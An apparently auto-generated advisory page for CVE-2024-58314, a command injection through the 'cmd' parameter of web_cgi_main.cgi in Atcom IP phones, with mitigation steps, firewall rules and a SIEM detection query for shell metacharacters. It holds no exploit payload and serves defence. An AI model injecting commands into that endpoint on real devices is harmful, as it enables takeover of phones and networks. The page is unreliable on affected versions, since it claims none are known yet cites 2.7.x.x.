CVE-2024-58314
📋 TL;DR
This CVE describes an authenticated command injection vulnerability in Atcom 100M IP Phones firmware that allows attackers with administrative credentials to execute arbitrary system commands via the web configuration interface. Attackers can inject shell commands through the 'cmd' parameter in web_cgi_main.cgi, leading to remote code execution. Organizations using affected Atcom IP phones with exposed web interfaces are at risk.
💻 Affected Systems
- Atcom 100M IP Phones
⚠️ Manual Verification Required
This CVE does not have specific version information in our database, so automatic vulnerability detection cannot determine if your system is affected.
Why? The CVE database entry doesn't specify which versions are vulnerable (no version ranges provided by the vendor/NVD).
🔒 Custom verification scripts are available for registered users. Sign up free to download automated test scripts.
- Review the CVE details at NVD
- Check vendor security advisories for your specific version
- Test if the vulnerability is exploitable in your environment
- Consider updating to the latest version as a precaution
⚠️ Risk & Real-World Impact
Worst Case
Full compromise of the IP phone device, lateral movement to internal networks, data exfiltration, and persistent backdoor installation.
Likely Case
Unauthorized access to phone configuration, call interception, credential theft, and use as pivot point for internal network attacks.
If Mitigated
Limited to authenticated users only, reducing attack surface but still vulnerable to insider threats or credential compromise.
🎯 Exploit Status
Exploit requires authentication but is trivial to execute once credentials are obtained.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Unknown
Vendor Advisory: https://www.atcom.cn/html/yingwenban/Product/Fast_IP_phone/2017/1023/135.html
Restart Required: Yes
Instructions:
1. Check vendor website for firmware updates. 2. Download latest firmware. 3. Upload via web interface. 4. Reboot device.
🔧 Temporary Workarounds
Disable Web Interface
allDisable the web configuration interface if not required for operations.
Configuration varies by device; check admin interface for web service disable option
Network Segmentation
linuxRestrict access to IP phone management interfaces using firewall rules.
iptables -A INPUT -p tcp --dport 80 -s trusted_network -j ACCEPT
iptables -A INPUT -p tcp --dport 80 -j DROP
🧯 If You Can't Patch
- Change default administrative credentials to strong, unique passwords
- Implement network segmentation to isolate IP phones from critical systems
🔍 How to Verify
Check if Vulnerable:
Check firmware version via web interface at http://[phone-ip]/status.cgi or similar endpointCheck Version:
curl -s http://[phone-ip]/status.cgi | grep -i firmwareVerify Fix Applied:
Verify firmware version is no longer 2.7.x.x and test command injection attempts fail📡 Detection & Monitoring
Log Indicators:
- Unusual web access patterns to /cgi-bin/web_cgi_main.cgi
- Commands with shell metacharacters in URL parameters
Network Indicators:
- HTTP POST requests to /cgi-bin/web_cgi_main.cgi with cmd parameter containing shell characters
SIEM Query:
source="web_logs" AND uri="/cgi-bin/web_cgi_main.cgi" AND (param="cmd" AND value MATCHES "[;&|`$()]" )